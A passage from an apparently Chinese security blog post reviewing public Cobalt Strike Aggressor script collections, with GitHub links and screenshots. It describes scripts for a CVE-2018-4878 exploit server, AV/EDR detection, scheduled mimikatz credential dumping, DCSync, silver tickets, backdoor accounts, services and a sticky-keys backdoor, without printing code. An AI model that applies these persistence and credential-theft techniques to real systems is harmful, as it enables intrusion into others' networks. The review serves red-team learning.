17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>3、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">介绍一个VincentYiu大佬写的一键起CVE-2018-4878（Flash漏洞）服务脚本。<br/>脚本名称：<strong>CVE-2018-4878.cna </strong><br/>脚本功能：CVE-2018-4878<br/>脚本位置：在attacks中<br/>地址： <a href="https://github.com/vysec/CVE-2018-4878" target="_blank">https://github.com/vysec/CVE-2018-4878</a><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.4995843724023275" data-s="300,640" style="" data-type="png" data-w="1203" src="https://wechat2rss.xlab.app/img-proxy/?k=a8b22401&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUWbqXeqmQTfK6pYt10QgicBvibADLFEtpuFkrUtVwm8BtHxkGZqD5Mk8g%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"> <br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong> </strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>4、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面介绍harleyQu1nn的脚本合集。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.65234375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=4046ff9d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1cSicK61tTRtM8IlbM1G4wy9PksZ24Wj4sFmDZAtd3C6mdem6zYkq8oQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址：</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/harleyQu1nn/AggressorScripts" target="_blank">https://github.com/harleyQu1nn/AggressorScripts</a><br/><strong>AVQuery.cna</strong> 检查杀毒是通过检查注册表键值来判断，同样的可以自行添加自己需要的条目。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.18484288354898337" data-s="300,640" style="" data-type="png" data-w="541" src="https://wechat2rss.xlab.app/img-proxy/?k=67b22648&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU3N6l1jud2icC6ibRL9UoCuic9khpPtZ2sPpb4df4t9DZHicZCzhX7pHfNw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"> <br/><strong>ArtifactPayloadGenerator.cna</strong> 生成的结果位于cs目录下的opt目录下。<br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.15031645569620253" data-s="300,640" style="" data-type="png" data-w="632" src="https://wechat2rss.xlab.app/img-proxy/?k=7831818e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUsevmaIcZC0r1EVFy219HpakLF6E9Flia8GvibLoTh72PqKzsxcE1u6hg%2F640%3Fwx_fmt%3Dpng"/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><img class="" data-copyright="0" data-ratio="0.8905660377358491" data-s="300,640" style="" data-type="png" data-w="265" src="https://wechat2rss.xlab.app/img-proxy/?k=22bfb564&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUyq6fj6yriaticO8gHAW4bMb3cxNicbqXyd8wC6c04AldpfJUs1DjDqVXQ%2F640%3Fwx_fmt%3Dpng"/><img class="" data-copyright="0" data-ratio="0.753731343283582" data-s="300,640" style="" data-type="png" data-w="268" src="https://wechat2rss.xlab.app/img-proxy/?k=5430b6e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUJ0M0WZSBaKCY4IzGvNpsx384zJOoVCZApST7ziaCBshjl7Hsia5PibvuA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>CertUtilWebDelivery.cna</strong> 和大家熟知的使用CertUtil下载文件的姿势差不多。</span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.33038585209003213" data-s="300,640" style="" data-type="png" data-w="1244" src="https://wechat2rss.xlab.app/img-proxy/?k=3e25b641&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUQpKrrfs3Mjj4cAeJgGaTYkfWEdHI9vN8pQMWqbmAp6icHnQIQApowQA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>EDR.cna</strong> 使用检测驱动的方式来检测是否存在终端安全产品。个人对于EDR产品的理解是：相对于主流杀毒软件，这类终端安全产品主要用来反APT类的持久化攻击，所以较之常规杀毒更为难缠。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.21673003802281368" data-s="300,640" style="" data-type="png" data-w="526" src="https://wechat2rss.xlab.app/img-proxy/?k=868b2909&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUYI3ZuFywZVGicUfvGUWibV51cyCcEjDcrJ2eDWWicdhVHVbjF0JbVVNSw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"> <br/><strong>logvis.cna</strong> 实现了beacon command log的可视化。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6982248520710059" data-s="300,640" style="" data-type="png" data-w="845" src="https://wechat2rss.xlab.app/img-proxy/?k=3aba0676&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUB4x9VBIibc9yfI22dZKI8ey9NQXHts0OUOoDjMibJxUR82syjOfxuH9A%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/> <strong>ProcessColor.cna</strong> 就是简单的进程上色版本啦，虽然没有tree，但是作者这一手也算是独具匠心。</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.8641456582633054" data-s="300,640" style="" data-type="png" data-w="714" src="https://wechat2rss.xlab.app/img-proxy/?k=cda4db74&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU5THNfdRMJMoyTkfnH9a3DuW1vqXKhxjibI8tsqrrG2t6h13NZKkfU0w%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>ProcessMonitor.cna </strong>可以实现指定时间段内对于程序运行情况的监控。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5418275418275418" data-s="300,640" style="" data-type="png" data-w="777" src="https://wechat2rss.xlab.app/img-proxy/?k=3f7e778b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUlVuNn9oia4cKibBqjuNXia7zGmOkMx2CaM42lWgAyDG0siab4o6pGYoVSw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>RedTeamRepo.cna</strong> 当中包含了不少tips，可以使用RedRepo命令查看。</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6486686390532544" data-s="300,640" style="" data-type="png" data-w="1352" src="https://wechat2rss.xlab.app/img-proxy/?k=aaf7f186&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUCMl1WhHnbVFKlAwazJHtWaoa8FwQlrpSluKxnG1NMo4RIzSicXEp3jg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>SMBPayloadGenerator.cna</strong> 可以生成基于SMB类型listener的payload，同样是输出到opt目录下。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.39895988112927194" data-s="300,640" style="" data-type="png" data-w="1346" src="https://wechat2rss.xlab.app/img-proxy/?k=06724479&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUeiaia9ESicAZA35rgic21IVIKwPdGdt5aRBmr8uQF5j3VGAPF3JnHic2I0A%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>Logging目录下的<strong>logger.cna</strong> 可以将log导出到HTML，log也位于opt目录中。</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7366666666666667" data-s="300,640" style="" data-type="png" data-w="300" src="https://wechat2rss.xlab.app/img-proxy/?k=9d17ef66&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUwOfw6vY5iajlSqBOjSsaYl1ynO95AiayghibsRibrrVkuCCZXRRjBHv1xQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>功能和实现方式上面脚本介绍那里都写了，总之就是持久化啦。不过某些操作动静比较大，以及存在特殊环境功能失效的可能，自己玩明白再实战哦，不然会翻车。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5068078668683812" data-s="300,640" style="" data-type="png" data-w="661" src="https://wechat2rss.xlab.app/img-proxy/?k=7af39ecb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU6upy9C4T69liavDJU9YTgniar9YcAGtibugALUQtW1KwIiaQfDdXMVuONw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong><br/></strong></span></p><p><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>5、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面介绍bluscreenofjeff蓝屏大佬的合集。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.73671875" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=29ebc729&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1MZ0wSb3Mj3mPvqd37gGV38LWTyHSh7gU0XoqQMk72SZVe1eJMFw9iaA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p style="margin: 0in;font-size: 11pt;"><span style="font-family: 微软雅黑;color: rgb(66, 63, 63);">地址：</span></p><p style="margin: 0in;font-size: 11pt;"><span style="font-family: 微软雅黑;color: rgb(66, 63, 63);"></span><span style="font-family: Calibri;" lang="zh-CN"><a href="https://github.com/bluscreenofjeff/AggressorScripts" target="_blank">https://github.com/bluscreenofjeff/AggressorScripts</a></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><strong><span style="font-size: 15px;color: rgb(66, 63, 63);">apache-style</span><span style="font-size: 15px;color: rgb(0, 0, 0);">-weblog-output.cna</span></strong><span style="font-size: 15px;color: rgb(0, 0, 0);"> 的功能是将teamserver的weblog以Apache的风格输出到cs目录下的we</span><span style="font-size: 15px;color: rgb(66, 63, 63);">blog.log文件当中。<br/>beacon_to_empire.cna 可以一键把会话弹到empire，不过需要提前在cna脚本当中配置好empire的信息。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.9634703196347032" data-s="300,640" style="" data-type="png" data-w="219" src="https://wechat2rss.xlab.app/img-proxy/?k=f712357d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUEVIDuY568LAve1QM4oicmhKrr1sf2ep233KDEE3XibXNiaJWQpXPYAIiaQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>beaconestablishednote.cna</strong>     用来给新上线的机器备注时间，虽然event log当中有，但是这里备注相对直观。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.2785923753665689" data-s="300,640" style="" data-type="png" data-w="341" src="https://wechat2rss.xlab.app/img-proxy/?k=cb530e37&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUWibkDTm02MFSK8UFHnp6Y74fglC79STiboiaE84HTILLDiaKo7icwCZUNkA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><br/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>beaconid_note.cna </strong>会给所有机器备注修改为bid，作者在注释中写到该脚本主要在编写aggressor脚本时使用。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.2916666666666667" data-s="300,640" style="" data-type="png" data-w="360" src="https://wechat2rss.xlab.app/img-proxy/?k=a54fc839&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUAK2EhGicUZYHWGjrtd8R0zKXB5ibfFK46pDqibMApuoSSwj9qVibKAMFJw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>简单来说就是运行这两个命令的快捷键，按键位置就在右键靶机出现的菜单当中。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5710455764075067" data-s="300,640" style="" data-type="png" data-w="373" src="https://wechat2rss.xlab.app/img-proxy/?k=1d92aed1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUPqO5kTbXcnKpALVEvUn3WaSHG7ibCEOmeCqHca96Z6fuSDB0S4AzaZg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>eventlog-to-slack.cna</strong> 的作用是配置后将日志传送到slack实现多端同步，有点像QQ或者TG的机器人。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7911547911547911" data-s="300,640" style="" data-type="png" data-w="407" src="https://wechat2rss.xlab.app/img-proxy/?k=a0669255&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUTJtliaEtkerPLh00JUPclbzlI86ianRicy27FbEwsGrWjiaNZibd7bn1gZA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>forcecheckin.cna</strong> 用来在设定的时间频率强制SMB类型的beacon回连，感觉其用意应该是用来检测连接性。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6013363028953229" data-s="300,640" style="" data-type="png" data-w="449" src="https://wechat2rss.xlab.app/img-proxy/?k=9d2937e1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUTNwuMibQ9aBKGaouWdrhLj9Q0ic7z9OHg2qBmtW8YLFyXwxUjqRFiathQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>mass-dcsync.cna</strong> 用来同步指定域内域用户的列表。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.4964871194379391" data-s="300,640" style="" data-type="png" data-w="427" src="https://wechat2rss.xlab.app/img-proxy/?k=1201dee2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUdk7srAdKyCvhiaiaIPKHkDuCz4ReUqZMGrKpnCuUzITk1flhTXdaSl8g%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>mimikatz-every-30m.cn</strong> 可以实现每30分钟抓一次密码，想修改时间的话可以直接在脚本当中修改。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.6963123644251626" data-s="300,640" style="" data-type="png" data-w="461" src="https://wechat2rss.xlab.app/img-proxy/?k=a1f28423&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUWKaEjCHMGic1Xvicm6dWJwl6KIZkbDrjgia1IqhRQBgvE6tfNBIvqsRzQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>mimikatz-timestamp-note-BETA.cna</strong> 用来给mimikatz的运行结果添加一个时间戳，不过作者表示该脚本目前正在测试当中。感觉应该是配合上面的定时mimikatz脚本来使用的。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.24791666666666667" data-s="300,640" style="" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=0c8094c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUg6LOcH9UROhJ4AZNsQk3SlHSjBQvQHcmd6Dfml4eicicDSibLFgzUDVcw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>ping_aliases.cna</strong> 脚本增加了“qping”和“smbscan”两条命令。qping就是使用-n参数做限制只ping目标一下，smbscan用来扫描SMB的445端口，smbscan支持将目标设置为ip段。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.7181102362204724" data-s="300,640" style="" data-type="png" data-w="635" src="https://wechat2rss.xlab.app/img-proxy/?k=a08a55b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUnTgibI5RyltvS7QPkicIibYogHGfSgAWgQMgt6hib9wNRpQ09aDVLWYgqg%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>powershell.cna</strong> 包含powerview和powerup，多个功能皆需借助PowerUp.ps1 和powerview.ps1 两个脚本来实现，脚本需要自行下载。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="1.0141843971631206" data-s="300,640" style="" data-type="png" data-w="282" src="https://wechat2rss.xlab.app/img-proxy/?k=8157965f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUb1gX5BzOAORB3ibyfLiaO2RefE6hQWQVUMFqpLiaXk7kwQv0yt5QvlNPQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>ps-window-alias.cna</strong>     为命令行中增加pspane命令一键打开processlist。<br/><strong>silver-tickets.cna </strong>可以一键制作一个白银票据。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.29596412556053814" data-s="300,640" style="" data-type="png" data-w="1115" src="https://wechat2rss.xlab.app/img-proxy/?k=77332221&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUWW8DQsDXM2naRE0bqHukaCOc3NCcfHWDVvsHA0SetbbSxqibFSYwgTA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>slack-notify-beacon.cna</strong> 和 slack-notify-webhit.cna 可以实现机器上线和web接收到web请求时通过slack进行通知。<br/><strong>sleep-down-when-no-operators.cna</strong> 可以实现当没有黑客在线时自动把sleep的时间调长。<br/><strong>sleeptimer.cna</strong> 则可以根据人类作息自动设置sleep间隔，默认时间是晚八点到早六点。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="1.0237623762376238" data-s="300,640" style="" data-type="png" data-w="505" src="https://wechat2rss.xlab.app/img-proxy/?k=d5b2913c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUTEJL3qZNUebDXRQxzeSnAymbNLCS1fnr0QNscdUN6eGORfDcEhRdWA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>stale-beacon-notifier.cna</strong> 可以实现机器长时间（时间可以指定）没有回连时通过slack进行通知。<br/><strong>timestamped_activitylog_export.cna</strong> 实现以时间戳为基准CS全局日志输出到指定位置的指定文件当中。<br/><strong>Beaconpire/beaconpire.cn </strong>实现empire相关配置参数的可视化控制，以及与empire实现一定程度的联动。<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5363636363636364" data-s="300,640" style="" data-type="png" data-w="330" src="https://wechat2rss.xlab.app/img-proxy/?k=76f6f23d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUEtnSNgPFRS6fYpSGyqaicq3IlbIEnZuCicXGeJAuXXCuzRe1nPegpXvw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>CCDC/lulz.cna</strong> 是一个整人脚本，功能与国外一些远控的joke很相似，可以实现 使用IE打开网页、弹消息框、关机、召唤clippy、打开boo.exe。<br/><strong>CCDC/misc.cna</strong> 可以实现单条修改目标机器hosts、替换目标机器hosts文件。<br/><strong>CCDC/sysinternal-killer.cna</strong> 微软工具包专杀。</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.43729903536977494" data-s="300,640" style="" data-type="png" data-w="311" src="https://wechat2rss.xlab.app/img-proxy/?k=2c93fb16&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUwRe1nlX5s7xicu2TIDlvF19lhmcleRbS5TMxXoSSIukqaBjNcYMdBjQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>OPSEC Profiles</strong> 目录下的脚本会覆盖内置的Cobalt Strike命令，个人理解为作者是为了防止用户操作时误触某个命令导致不好的后果，配置文件当中可以修改每个命令的开关。<br/>例如powershell.cna 的效果:<br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.07770700636942675" data-s="300,640" style="" data-type="png" data-w="785" src="https://wechat2rss.xlab.app/img-proxy/?k=eb9d9e5e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNU7MHPiaG2L57Xrhxh9jJL7kfegicg2ib64f0DzOhXZwcODzouYGNSemjxA%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>6、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面要介绍的是一个老哥收集的别人的脚本，跟上面的有很大的重复，所以我只分析几个上面没有的我又找不到原作者的脚本。<br/></span><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.34406215316315203" data-s="300,640" style="" data-type="png" data-w="3604" src="https://wechat2rss.xlab.app/img-proxy/?k=7b69b19c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh1X85BtZeauIPdJC7VNnmr1bEfHbKHibOKzMAqmbCiaaZMZXn5oP1jmLKsRWJHNPlvdpZIYC30o52aw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/>地址： <br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><a href="https://github.com/michalkoczwara/aggressor_scripts_collection" target="_blank">https://github.com/michalkoczwara/aggressor_scripts_collection</a><br/>这里的<strong>All_In_One.cna</strong> 就是上面蓝屏大佬的旧版本，虽然旧版本可以用但是旧版本没有太大意义。<br/><strong>backdoor_accounts.cna</strong> 两个选项的作用分别是激活guest用户添加到本地管理员或者域管。<br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5" data-s="300,640" style="" data-type="png" data-w="372" src="https://wechat2rss.xlab.app/img-proxy/?k=ea304644&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUQ74tq1C3DR7sUYorNYvicib7AJXeEhCa62228c0Rh1HLaL56GWGYGZ5g%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong><br/></strong></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><strong>beaconSMS.cna </strong>可以实现变动短信息通知。</span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.23950617283950618" data-s="300,640" style="" data-type="png" data-w="405" src="https://wechat2rss.xlab.app/img-proxy/?k=6421d423&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0GJgajYAYjHTYBXcTeUyNUfH30AKBL9nXLDCj85Ej8Bccn71rEYvlwuibZnJpAH1Qyp51CsheNdlQ%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/><strong>say.cna</strong> 看代码的意思是上线机器是admin的话就说“一个新的admin机器”，不知道是不是其他地方的组件，意义不大。<br/><strong>service-reboot.cna</strong> 会使用sc创建一个后门服务，重启有效    。<br/><strong>sticky-keys.cna</strong> 会修改防火墙规则然后把粘滞键在注册表的记录修改为cmd，这样就可以实现连接机器3389然后调出粘滞键后门了。<br/></span></p><p><br/><span style="font-size: 15px;color: rgb(66, 63, 63);"></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"><br/></span></p><p><span style="font-size: 15px;color: rgb(66, 63, 63);"></span><span style="color: rgb(66, 63, 63);font-size: 17px;"><strong>7、</strong></span><span style="font-size: 15px;color: rgb(66, 63, 63);">下面要介绍Vincent Yiu师傅的小合集。<br/></span></p><p><br/></p><p style="text-align: center;"><img class="" data-copyright="0" data-ratio="0.5" data-s="300,640" style="" data-type="png" data-w="1280" 